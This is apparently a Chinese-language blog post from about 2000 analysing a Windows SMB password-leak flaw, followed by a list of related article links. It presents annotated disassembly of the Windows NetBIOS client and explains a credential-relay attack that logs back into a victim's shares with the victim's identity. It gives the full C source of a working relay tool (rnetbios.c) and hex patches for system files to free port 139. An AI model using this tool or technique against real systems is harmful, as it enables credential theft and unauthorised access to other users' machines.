157C8 66| 8B C1 mov ax,cx
157CB 66| 25 0200 and ax,200h
157CF 66| 3D 0001 cmp ax,1
157D3 B8 00000000 mov eax,0
157D8 83 D0 FF adc eax,0FFFFFFFFh
157DB 66| 83 E1 03 and cx,3
157DF 83 E0 04 and eax,4
157E2 66| 83 F9 01 cmp cx,1
157E6 89 43 17 mov dword ptr [ebx+17h],eax
157E9 1B C9 sbb ecx,ecx
157EB 41 inc ecx
157EC 0B C8 or ecx,eax
157EE 83 7D F8 00 cmp dword ptr [ebp+LOCAL_2],0
157F2 89 4B 17 mov dword ptr [ebx+17h],ecx
157F5 0F 84 00000244 jz loc_1740
157FB 8A 4A 19 mov cl,byte ptr [edx+19h]
; SECURITY MODE 安全模式
;是服务方发过来的数据,所以服务方可以主动按其需要修改
157FE F6 C1 01 test cl,1
15801 0F 84 000001CB jz loc_1739
; USER OR SHARE MODE
;共享控制的跳转
15807 80 7F 05 02 cmp byte ptr [edi+5],2
1580B 75 53 jne short loc_1729
1580D 8B 45 F8 mov eax,dword ptr [ebp+LOCAL_2]
15810 8B 70 28 mov esi,dword ptr [eax+28h]
15813 85 F6 test esi,esi
15815 74 12 jz short loc_1726
15817 8D 7B 1D lea edi,dword ptr [ebx+1Dh]
1581A B9 00000006 mov ecx,6
1581F F3/ A5 rep movsd
15821 66| C7 43 0F 0018 mov word ptr [ebx+0Fh],18h
;PASSWORD LONG
15827 EB 06 jmp short loc_1727
15829 loc_1726:
15829 66| C7 43 0F 0000 mov word ptr [ebx+0Fh],0
1582F loc_1727:
1582F 33 C0 xor eax,eax
15831 8B 4D F8 mov ecx,dword ptr [ebp+LOCAL_2]
15834 66| 8B 43 0F mov ax,word ptr [ebx+0Fh]
15838 8B 71 2C mov esi,dword ptr [ecx+2Ch]
1583B 85 F6 test esi,esi
1583D 8D 7C 18 1D lea edi,dword ptr [eax+1Dh][ebx]
15841 74 12 jz short loc_1728
15843 B9 00000006 mov ecx,6
15848 F3/ A5 rep movsd
1584A 66| C7 43 11 0018 mov word ptr [ebx+11h],18h
15850 E9 000000E8 jmp loc_1736
15855 loc_1728:
15855 66| C7 43 11 0000mov word ptr [ebx+11h],0
1585B E9 000000DD jmp loc_1736
15860 loc_1729:
15860 C7 45 FC 00001A78 mov dword ptr [ebp+LOCAL_1],1A78h
15867 F6 46 1C 20 test byte ptr [esi+1Ch],20h
1586B 74 08 jz short loc_1730
1586D 83 C6 35 add esi,35h
15870 89 75 FC mov dword ptr [ebp+LOCAL_1],esi
15873 EB 12 jmp short loc_1731
15875 loc_1730:
15875 8B 55 10 mov edx,dword ptr [ebp+PARAMETER_3]
15878 8B 42 0C mov eax,dword ptr [edx+0Ch]
1587B F6 40 1C 20 test byte ptr [eax+1Ch],20h
1587F 74 06 jz short loc_1731
15881 83 C0 35 add eax,35h
;THE PASSWORD POINTER
15884 89 45 FC mov dword ptr [ebp+LOCAL_1],eax
15887 loc_1731:
15887 8B 45 FC mov eax,dword ptr [ebp+LOCAL_1]
1588A 80 38 00 cmp byte ptr [eax],0;
;THE PASSWORD
1588D 75 09 jne short loc_1732
;比较看有否输入密码,如果没有密码就用用户密码替换
;因为开始还没有出来提示输入密码时就有好几次密码实验,
;所以一定有没有密码的情况,也就泄露了当前用户密码
1588F 8B 45 F8 mov eax,dword ptr [ebp+LOCAL_2]
15892 83 C0 05 add eax,5
15895 89 45 FC mov dword ptr [ebp+LOCAL_1],eax
; 登录WINDOWS用户的密码替换没有密码的指针
;就这产生泄露密码漏洞
15898 loc_1732:
15898 F6 C1 02 test cl,2
;密码加密不?服务端发过来的安全模式
1589B 66| C7 43 0F 0018 mov word ptr [ebx+0Fh],18h
;PASSWORD LONG
158A1 66| C7 43 11 0000 mov word ptr [ebx+11h],0
158A7 74 76 jz short loc_1734
;密码不加密跳转
158A9 F6 C1 0C test cl,0Ch
158AC 74 3C jz short loc_1733
158AE 8B 55 10 mov edx,dword ptr [ebp+PARAMETER_3]
158B1 F6 42 14 02 test byte ptr [edx+14h],2
158B5 75 33 jnz short loc_1733
158B7 8D 73 1D lea esi,dword ptr [ebx+1Dh]
158BA 8B 45 FC mov eax,dword ptr [ebp+LOCAL_1]
158BD 56 push esi
158BE 50 push eax
158BF 8D 42 6C lea eax,dword ptr [edx+6Ch]
158C2 50 push eax
158C3 E8 FFFF15F4 call sub_0068
;LOCK THE PASSWORD
158C8 83 C4 0C add esp,0Ch
158CB 8B 4D 10 mov ecx,dword ptr [ebp+PARAMETER_3]
158CE 81 C1 0000009C add ecx,9Ch
158D4 8B 06 mov eax,[esi]
158D6 89 01 mov [ecx],eax
158D8 8B 56 04 mov edx,dword ptr [esi+4]
158DB 89 51 04 mov dword ptr [ecx+4],edx
158DE 8B 7E 08 mov edi,dword ptr [esi+8]
158E1 89 79 08 mov dword ptr [ecx+8],edi
158E4 8B 46 0C mov eax,dword ptr [esi+0Ch]
158E7 89 41 0C mov dword ptr [ecx+0Ch],eax
158EA loc_1733:
158EA 8D 73 1D lea esi,dword ptr [ebx+1Dh]
158ED 8B 45 FC mov eax,dword ptr [ebp+LOCAL_1]
158F0 56 push esi
158F1 50 push eax
158F2 8B 45 10 mov eax,dword ptr [ebp+PARAMETER_3]
158F5 83 C0 6C add eax,6Ch
158F8 50 push eax
158F9 E8 FFFF15B8 call sub_0067
158FE 83 C4 0C add esp,0Ch
15901 8B 55 10 mov edx,dword ptr [ebp+PARAMETER_3]
15904 F6 42 19 0C test byte ptr [edx+19h],0Ch
15908 74 33 jz short loc_1736
1590A F6 42 14 02 test byte ptr [edx+14h],2
1590E 75 2D jnz short loc_1736
15910 8D BA 00000084 lea edi,dword ptr data_0010[edx]
15916 B9 00000006 mov ecx,6
1591B F3/ A5 rep movsd
1591D EB 1E jmp short loc_1736
1591F loc_1734:
;不加密密码跳转到这
1591F 80 3D 000001E0 00 cmp byte ptr data_0041,0 ;
; 准许明文密码不?
;注册表中的一项 ENABLEPLAINTEXTPASSWORD 设置,可惜现在缺省是不准,
;要不就可以得到明文密码了
15926 74 0F je short loc_1735
15928 8D 7B 1D lea edi,dword ptr [ebx+1Dh]
1592B 8B 75 FC mov esi,dword ptr [ebp+LOCAL_1]
1592E B9 00000006 mov ecx,6
15933 F3/ A5 rep movsd
;THE PASSWORD ,NOT LOCK
15935 EB 06 jmp short loc_1736
15937 loc_1735:
15937 66| C7 43 0F 0000 mov word ptr [ebx+0Fh],0
1593D loc_1736:
1593D 8B 75 F8 mov esi,dword ptr [ebp+LOCAL_2]
15940 B9 FFFFFFFF mov ecx,0FFFFFFFFh
15945 83 C6 13 add esi,13h
15948 2B C0 sub eax,eax
1594A 8B FE mov edi,esi
1594C F2/ AE repne scasb
1594E F7 D1 not ecx
15950 8B C1 mov eax,ecx
15952 33 D2 xor edx,edx
15954 66| 8B 53 11 mov dx,word ptr [ebx+11h]
15958 33 C9 xor ecx,ecx
1595A 66| 8B 4B 0F mov cx,word ptr [ebx+0Fh]
1595E 03 CA add ecx,edx
15960 8B 55 10 mov edx,dword ptr [ebp+PARAMETER_3]
15963 8D 7C 19 1D lea edi,dword ptr [ecx+1Dh][ebx]
15967 66| 8B 4A 1A mov cx,word ptr [edx+1Ah]
1596B 89 7D FC mov dword ptr [ebp+LOCAL_1],edi
1596E F6 C5 02 test ch,2
15971 74 2F jz short loc_1737
15973 F6 C1 80 test cl,80h
15976 74 2A jz short loc_1737
15978 83 3D 0000190C 00 cmp dword ptr data_0161,0
1597F 74 21 je short loc_1737
15981 8B CF mov ecx,edi
15983 6A 01 push dword ptr 1
15985 2B 4D 0C sub ecx,dword ptr [ebp+PARAMETER_2]
15988 50 push eax
15989 83 E1 01 and ecx,1
1598C 56 push esi
1598D 66| 01 4B 1B add word ptr [ebx+1Bh],cx
15991 01 4D FC add dword ptr [ebp+LOCAL_1],ecx
15994 8B 4D FC mov ecx,dword ptr [ebp+LOCAL_1]
15997 51 push ecx
15998 E8 FFFF1679 call sub_0097
1599D 83 C4 10 add esp,10h
159A0 EB 11 jmp short loc_1738
159A2 loc_1737:
159A2 8B 7D FC mov edi,dword ptr [ebp+LOCAL_1]
159A5 8B C8 mov ecx,eax
159A7 C1 E9 02 shr ecx,2
159AA F3/ A5 rep movsd
159AC 8B C8 mov ecx,eax
159AE 83 E1 03 and ecx,3
159B1 F3/ A4 rep movsb
159B3 loc_1738:
159B3 66| 8B 4B 0F mov cx,word ptr [ebx+0Fh]
159B7 8B 55 FC mov edx,dword ptr [ebp+LOCAL_1]
159BA 66| 03 4B 11 add cx,word ptr [ebx+11h]
159BE 03 D0 add edx,eax
159C0 66| 03 C8 add cx,ax
159C3 66| 89 4B 1B mov word ptr [ebx+1Bh],cx
159C7 8B 4D 0C mov ecx,dword ptr [ebp+PARAMETER_2]
159CA 89 51 3A mov dword ptr [ecx+3Ah],edx
159CD E9 0000008A jmp loc_1741
159D2 loc_1739:
159D2 C6 43 1D 00 mov byte ptr [ebx+1Dh],0
159D6 8B 75 F8 mov esi,dword ptr [ebp+LOCAL_2]
159D9 B9 FFFFFFFF mov ecx,0FFFFFFFFh
159DE C6 43 1E 00 mov byte ptr [ebx+1Eh],0
159E2 66| C7 43 11 0001 mov word ptr [ebx+11h],1
159E8 66| C7 43 0F 0001 mov word ptr [ebx+0Fh],1
159EE 83 C6 13 add esi,13h
159F1 2B C0 sub eax,eax
159F3 8B FE mov edi,esi
159F5 F2/ AE repne scasb
159F7 F7 D1 not ecx
159F9 8B D1 mov edx,ecx
159FB 33 C9 xor ecx,ecx
159FD 66| 8B 4B 11 mov cx,word ptr [ebx+11h]
15A01 8D 42 02 lea eax,dword ptr [edx+2]
15A04 66| 89 43 1B mov word ptr [ebx+1Bh],ax
15A08 33 C0 xor eax,eax
15A0A 66| 8B 43 0F mov ax,word ptr [ebx+0Fh]
15A0E 03 C1 add eax,ecx
15A10 8B CA mov ecx,edx
15A12 C1 E9 02 shr ecx,2
15A15 8D 7C 18 1D lea edi,dword ptr [eax+1Dh][ebx]
15A19 F3/ A5 rep movsd
; THE USER NAME
15A1B 8B CA mov ecx,edx
15A1D 83 E1 03 and ecx,3
15A20 F3/ A4 rep movsb
15A22 33 F6 xor esi,esi
15A24 33 C0 xor eax,eax
15A26 66| 8B 73 0F mov si,word ptr [ebx+0Fh]
15A2A 8B 4D 0C mov ecx,dword ptr [ebp+PARAMETER_2]
15A2D 66| 8B 43 11 mov ax,word ptr [ebx+11h]
15A31 03 F0 add esi,eax
15A33 03 F2 add esi,edx
15A35 03 F3 add esi,ebx
15A37 83 C6 1D add esi,1Dh
15A3A 89 71 3A mov dword ptr [ecx+3Ah],esi
15A3D EB 1D jmp short loc_1741
15A3F loc_1740:
15A3F 33 C0 xor eax,eax
15A41 8D 53 1F lea edx,dword ptr [ebx+1Fh]
15A44 66| 89 43 0F mov word ptr [ebx+0Fh],ax
15A48 66| 89 43 11 mov word ptr [ebx+11h],ax
15A4C 66| 89 43 1D mov word ptr [ebx+1Dh],ax
15A50 8B 45 0C mov eax,dword ptr [ebp+PARAMETER_2]
15A53 66| C7 43 1B 0002 mov word ptr [ebx+1Bh],2
15A59 89 50 3A mov dword ptr [eax+3Ah],edx
15A5C loc_1741:
15A5C 8B 55 10 mov edx,dword ptr [ebp+PARAMETER_3]
15A5F 66| 8B 42 1A mov ax,word ptr [edx+1Ah]
15A63 F6 C4 02 test ah,2
15A66 0F 84 000000C9 jz loc_1744
15A6C A8 80 test al,80h
15A6E 0F 84 000000C1 jz loc_1744
15A74 83 3D 0000190C 00 cmp dword ptr data_0161,0
15A7B 0F 84 000000B4 je loc_1744
15A81 8B 4D 0C mov ecx,dword ptr [ebp+PARAMETER_2]
15A84 83 7D F8 00 cmp dword ptr [ebp+LOCAL_2],0
15A88 8B 71 3A mov esi,dword ptr [ecx+3Ah]
15A8B 89 75 FC mov dword ptr [ebp+LOCAL_1],esi
15A8E 74 1E jz short loc_1742
15A90 8B 55 F8 mov edx,dword ptr [ebp+LOCAL_2]
15A93 83 C2 30 add edx,30h
15A96 80 3A 00 cmp byte ptr [edx],0
15A99 74 13 je short loc_1742
15A9B 8B FA mov edi,edx
15A9D B9 FFFFFFFF mov ecx,0FFFFFFFFh
15AA2 2B C0 sub eax,eax
15AA4 6A 01 push dword ptr 1
15AA6 F2/ AE repne scasb
15AA8 F7 D1 not ecx
15AAA 51 push ecx
15AAB 52 push edx
15AAC EB 18 jmp short loc_1743
15AAE loc_1742:
15AAE BF 000021D2 mov edi,21D2h
15AB3 B9 FFFFFFFF mov ecx,0FFFFFFFFh
15AB8 2B C0 sub eax,eax
15ABA 6A 01 push dword ptr 1
15ABC F2/ AE repne scasb
15ABE F7 D1 not ecx
15AC0 51 pushecx
这得到的密码一般是加密的,但可以离线破解,其实还有一个攻击。让我们先来
看看SMB的连接过程。下面是SMB的密码认证方式、WINDOWS的139口的访问过程,
箭头表示数据方向:
1、客户端<--------------------建立TCP连接----------------->服务端
2、客户端-------客户端类型、支持的服务方式列表等----------->服务端
3、客户端<------服务器支持协议、认证方式、加密用的key等-----服务端
认证方式就是用户级认证还是共享级认证和密码加密不,key是服务器随机生成的
8个字节,WIN2000已经支持16个字节的 key。
4、客户端--------------用户名、加密后密码----------------->服务端
WIN9X、WINNT、WIN2000这有个漏洞,不经过提示等就把当前用户名,密码加密后
发过去了,导致密码泄漏。这儿加密是DES的变形,lockedpass=chgdes(key,pass)。
这儿的pass是作为DES变形的KEY,key是作为DES变形的待加密数据。
5、客户端<---------------认证成功否-----------------------服务端
WINDOWS客户端第4步有漏洞,显然服务端可以得到username和
lockedpass=chgdes(key,pass), 其中key可以自由指定,因为这是服务方提供的,
usname、pass是客户端当前访问者用户名和密码。这儿的加密变换不可逆,但已经
可以用暴力法破解了,也已经有了这样的程序。其实我们有时并不一定要得到密码
明文的,只要能提供连接需要的就可以了。我们来看得到lockedpass有什么用,我
们反过去访问看看,telnet、ftp等连接要密码明文我们得到的lockedpass不能提
供,那么我们考虑用同样加密算法传密码密文的服务呢?比如就是NETBIOS共享服
务。前面是服务端得到东西,那现在就是站在客户端了,再看前面那过程,显然其
实我们并不需要提供pass,是不是只需要提供username和lockedpass2=chgdes(key2,pass)
就可以了?其中key2是现在的服务端提供的。看看我们有
usname和lockedpass=chgdes(key,pass)其中key我们可以自己指定,大家一看显然
只要key=key2那么就需要的我们都有了是不是?所以我们要使得key=key2.
好,让我们再仔细看看连接过程,别人连接两步1、2:
1、客户端<--------------------建立TCP连接----------------->服务端
2、客户端--------客户端类型、支持的服务方式列表等---------->服务端
下面就该:
3、客户端<---------服务器认证方式、加密用的key等-----------服务端
这我们需要提供key,这儿我们不能随便提供key,需要提供key2,那么我们就要得到
key2,显然需要连接NETBIOS服务回去。显然这而需要连接回去的11,22,33共3步
(为了区分连接回去的步子用重号表示)才能得到key2,显然这2步和3步不需要有
先后顺序。所以我们可以得到连接指定IP的NETBIOS服务然后等这用户来访问,这可
能有时间超时等处理,或者等到任意IP连接NETBIOS服务后马上连回去,反正怎么处
理方便、满足需要就怎么处理。下面显然就是设置 key=key2返回3,那就等4得到
lockedpass了,第5步嘛就你自由处理了,要不返回密码错误,后面就是44、55。。。。
总的来就是1,2,11,22,33,3,4,5,44,55。。。。。显然你就是以那机器访
问你的用户的身份去访问他的NETBIOS服务了,能干什么那就看那用户的权限了。
下面是我做的利用这漏洞的程序,因为是为了演示这漏洞,所以程序做得不是很完
美。可以在WIN9X里面运行,因为是作为139口的守护进程,所以需要把运行机器本
身的139口关掉,可以在VNBT。386文件里面寻找HEX: 68 8B 00 00 00 (NETBIOS
开139口的代码,0x8b=139),改成68 EF 00 00 00,本身的139口就成了239口了。还
有WINNT系统的磁盘一般共享为DRIVE$,在共享里面不显示,也可以在客户端修改让
其显示,以方便查看。修改方法,文件MSNP32.DLL,找HEX :8B 74 24 10 6A 24
56 E8 ,改成 8B 74 24 10 6A FF 56 E8就可以。如果版本不一样,可能会HEX不
一样,所以如果找不到,可以找短一点的HEX,比如6A 24 ??E8,"??"表示任意
一字节数据。 因为MSNO32.DLL文件始终是处于打开方式,所以修改可以先复制一
份,修改复制的,改好后启动到DOS,覆盖回去。
// rnetbios.c
// useage: rnetbios [ip] [ip]
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
void printfusage(int argc ,char *argv);
void testconnect();
void get_d_ip(int argc,char *argv);
void setserver();
void openfd3(int argc,char *argv);
void opensockfd4(int argc,char *argv);
void set_servername();
void recvpacket();
void recvfd2packet();
void out();
char *server;
char buff[20480];
char buff0x72[20480];
char buff0x73[20480];
char buff0x82[]={0x82,0,0,0,0,0};
char namereq[]={0x81,0,0,0};
int long72=0;
int long73=0;
struct sockaddr_in s_in,s_in2,s_in3,s_in4;
struct sockaddr addr,addr2;
struct hostent *he;
int usernameaddress1;
int usernameaddress2;
int strflg1,strflg2;
int loginhimself;
int fd,fd2,fd3,fd4;
int i,j,k,l;
SOCKET d_ip;
char servername[]={"*SMBSERVER"};
// WIN9X 不支持,正好可以过滤WIN9X
u_short serverport=139;
u_short name;
char buffgetname[]={0x00,0x72,0x00,0x10,0x00,0x01,0x00,0x00,0x00,0x00,
0x00,0x00,0x20,0x43,0x4b,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,0x00,0x01};
char namebuff[]={0x81,0,0,0x44,0x20,0x45,0x4f,0x45,0x42,0x45,0x4a,
0x43,0x48,0x46,0x44,0x43,0x41,0x46,0x48,0x45,0x50,0x46,0x43,0x45,0x4d,
0x45,0x45,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,00,0x20,
0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x43,0x41,
0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,
0x43,0x41,0x41,0x41,00};
int main(int argc, char **argv)
{
printfusage(argc,argv[0]);
testconnect();
set_servername();
get_d_ip(argc,argv[1]);
setserver();
while(1){
i=sizeof(struct sockaddr);
fd2=-1;
while(fd2<=0){
fd2=accept(fd,&addr,&i);
}
memcpy(&s_in2,&addr,15);
s_in2.sin_family = AF_INET;
s_in2.sin_port = htons(serverport);
if(loginhimself==1) {
s_in4.sin_addr.s_addr=s_in2.sin_addr.s_addr;
}
printf("/n Now %s ",inet_ntoa(s_in2.sin_addr));
printf("begin netbios connect %s",inet_ntoa(s_in4.sin_addr));
if(loginhimself==0) s_in2.sin_addr.s_addr=d_ip;
fd3 = socket(AF_INET, SOCK_STREAM,0);
j=0;
k=0;
l=0;
openfd3(argc,argv[2]);
printf("/n can't connect %s",inet_ntoa(s_in2.sin_addr));
closesocket(fd2);
closesocket(fd3);
}
out();
return(0);
}
void printfusage(argc,argv)
{
printf("/n rnetbios ver 1.0.");
printf("/n copywrite by yuange 2000.4.7.");
printf("/n wellcome to my homepage http://yuange.yeah.net.");
printf("/n usage: %s [ip] [ip]",argv);
//argv[0]);
}
void testconnect()
{
WSADATA wsaData;
int result;
result= WSAStartup(MAKEWORD(1, 1), &wsaData);
if (result != 0) {
fprintf(stderr, "Your computer was not connected "
"to the Internet at the time that "
"this program was launched, or you "
"do not have a 32-bit "
"connection to the Internet.");
exit(1);
}
}
void set_servername( )
{
int i,j;
j=0;
for(i=0;i<16;++i){
name=servername[i] ;
if(name==0) j=1;
if(j==1) name=0x20;
namebuff[2*i+5]= ( (name >> 4) & 0x000F ) + 'A';
namebuff[2*i+6]= (name & 0x000F) + 'A';
}
namebuff[37]=0;
}
void opensockfd4(argc,argv)
{
printf("/n please use the next ip login.");
i=sizeof(struct sockaddr);
fd4=accept(fd,&addr2,&i);
memcpy(&s_in3,&addr2,15);
s_in3.sin_family = AF_INET;
s_in3.sin_port = htons(serverport);
if(argc>=3) {
server=argv;
d_ip = inet_addr(server);
}
if(d_ip==-1) d_ip=inet_addr("127.0.0.1");
// 不过好象127。0。0。1 不能用于访问NETBIOS?
printf("/n the next ip %s ", inet_ntoa(s_in3.sin_addr));
if(s_in3.sin_addr.s_addr!=d_ip&&d_ip!=0) closesocket(fd4);
else {
i = 1;
ioctlsocket(fd4, FIONBIO, &i);
while(k==0){
buff[0]=0;
buff[8]=0;
i=recv(fd4,buff,20480,0);
if(i==0) {
closesocket(fd4);
printf("/n fd4 close");
return;
}
if(memcmp(buff,namereq,3)==0) {
send(fd4,buff0x82,6,0);
printf("/n send name 0x82 packet.");
}
if(buff[8]==0x72) {
memcpy(buff0x72+0x1c,buff+0x1c,8);
memcpy(buff,buff0x72,long72);
printf("/n send smb 0x72 packet .");
buff[0x25]=5;
//run in win9x.the win9x netbios client use
//这儿客户端可能要WIN9X,不知道WINT。WIN2000怎么处理。
send(fd4,buff,long72,0);
}
if(buff[8]==0x73||buff[8]==0x75) {
long73=i;
// memcpy(buff+0x1c,buff0x73+0x1c,8);
printf("/n send smb 0x73 packet .");
if(buff[0x33]==0x18) {
memcpy(buff+0x41,buff0x73+0x41,0x18);
// copy password
if(buff[0x35]==0x18) memcpy(buff+0x41+0x18,buff0x73+0x41+0x18,0x18);
// copy the next password
strflg1=buff0x73[0x0f];
strflg1&=0x80;
if(strflg1!=0) strflg1=1;
strflg2=buff[0x0f];
strflg2&=0x80;
if(strflg2!=0) strflg2=1;
//str is unicode ?
usernameaddress1=0x41+0x18+buff0x73[0x35]+strflg1;
usernameaddress2=0x41+0x18+buff[0x35]+strflg2;
name=1;
while(name!=0){
name=buff0x73[usernameaddress1];
if(strflg1==0) ++usernameaddress1;
else usernameaddress1+=2;
buff[usernameaddress2]=name;
++usernameaddress2;
if(strflg2!=0) {
++usernameaddress2;
buff[usernameaddress2]=0;
}
}
// copy user name ,不够严谨,不过勉强能用。
printf("/n send the pass 0x%x bytes",long73);
}
else printf("/n can't chang pass");
// buff[0x9]=0;
send(fd3,buff,long73,0);
// while(k==0){ //看怎么处理好?
i=recv(fd3,buff,20480,0);
// if(i>0&&buff[0x9]==0) printf("/n now login ok .");
// if(i>0) {
// k=1;
// send(fd4,buff,i,0);
// printf("/n send fd4 0x73 packet 0x%x bytes",i);
// }
// }
k=1;
// i=-1;
}
}
}
}
void recvpacket()
{
if(j==0) recvfd2packet();
else i=recv(fd4,buff,20480,0);
if(i==0) {
if(j==0) {
printf("/n fd2 close .");
return;
}
else {
printf("/n fd4 close ." );
k=0;
closesocket(fd4);
}
}
}
void recvfd2packet()
{
buff[0x8]=0;
i=recv(fd2,buff,20480,0);
if(buff[0x8]==0x72){
memcpy(buff0x72,buff,i);
memset(buff+0xc,0,4);
//这儿是系统支持什么服务的标记,WIN2000与WINNT系统不一样。
//有一方是WINNT看一般就是0,而两方都是WIN2000后面协议的密码方式就不一样。
//设置成0,欺骗让其以WINNT的方式发送加密的密码,以好截获。但可能WIN2000支持不好。
printf("/n fd2 recv smb 0x72 packet ");
}
if(buff[0x8]==0x73||buff[0x8]==0x75){
k=0;
memcpy(buff0x73,buff,i);
if(buff0x73[0x24]==0x0c) printf("/n this is win2000 system ?");
printf("/n get password from fd2.");
}
}
void get_d_ip(argc,argv)
{
d_ip=-1;
if(argc>=2) {
server=argv;
d_ip = inet_addr(server);
if(d_ip==-1){
he = gethostbyname(server);
if(!he) printf("/n Can't get the ip of %s !/n",server);
else memcpy(&d_ip, he->h_addr, 4);
}
}
if(d_ip==0) d_ip=-1;
if(d_ip==-1){
loginhimself=1;
printf("/n rnetbios the netbios ip.");
}
else {
loginhimself=0;
printf("/n rnetbios to %s",server);
}
s_in4.sin_addr.s_addr=d_ip;
}
void setserver()
{
fd = socket(AF_INET, SOCK_STREAM,0);
s_in.sin_family = AF_INET;
s_in.sin_port = htons(serverport);
s_in.sin_addr.s_addr = 0;
i=sizeof(struct sockaddr);
bind(fd,&s_in,i);
listen(fd,100);
}
void openfd3(argc,argv)
{
if(!connect(fd3, (struct sockaddr *)&s_in2, sizeof(struct sockaddr_in)))
{
i = 1;
ioctlsocket(fd2, FIONBIO, &i);
i = 1;
ioctlsocket(fd3, FIONBIO, &i);
while(1)
{
recvpacket();
// if(i==0){
// printf("/n fd2 or fd4 close.");
// break;
// }
if(i>0) {
if(memcmp(buff,namereq,3)==0) send(fd3,namebuff,0x48,0);
else {
send(fd3,buff,i,0);
printf("/n send fd3 0x%x packet", buff[8]);
}
}
buff[8]=0;
i=recv(fd3,buff,2048,0);
if(i>0) printf("/n recv fd3 0x%x packet 0x%x bytes",buff[0x8],i);
if(i>0&&j==0){
if(buff[8]==0x72) {
memcpy(buff0x72,buff,i);
long72=i;
}
if(buff[8]==0x73||buff[8]==0x75){
if(buff[0x9]==0&&buff0x73[0x33]==0x18){
j=1;
closesocket(fd2);
printf("/n now fd2 login ok!");
}
}
}
if(i==0){
printf("/n fd3 colse .");
break;
}
while(j==1&&k==0) opensockfd4(argc,argv);
if(i>0) {
if(j==0) send(fd2,buff,i,0);
else {
printf("/n send fd4 0x%x packet",buff[0x8]);
send(fd4,buff,i,0);
}
}
}
}
}
void out()
{
closesocket(fd);
WSACleanup( );
}
- WINDOWS密码泄露漏洞分析
- WINDOWS密码泄露漏洞分析
- Windows SMB漏洞分析
- Windows 内核漏洞 ms08025 分析
- Windows 内核漏洞 ms08025 分析
- Windows 常见端口漏洞分析
- 微软系统泄露密码入侵分析
- 一般常见的重置密码漏洞分析
- windows下内存泄露分析工具
- Windows平台下内存泄露分析:WinDbg
- windows常见漏洞分析(一)
- windows常见漏洞分析(二)
- windows常见漏洞分析(三)
- TP-LINK多款路由器被曝存漏洞 或泄露网银密码
- photokorn 信息泄露漏洞
- 文件泄露漏洞
- 又一篇 TCP/IP的漏洞 WINDOWS密码泄密
- 一些常见的重置密码漏洞分析整理
- 待业
- 今天重做了系统
- 八年一觉IT梦(1)
- 关于利用Tocmat安全域实现安全认证的问题
- JAXB技术的魔力
- WINDOWS密码泄露漏洞分析
- 重新安装 Windows 2000 后密码的恢复
- 我看C++/CLI(转贴)
- 给初学编程者的一封信
- 用JAVA做数字签名
- 041113今晚去蒙古包烧烤!
- NTFS下一种隐藏颇深的文件存取格式
- 关于arp欺骗的技术文档
- 如何清除临时文件,释放空间,提高计算机性能
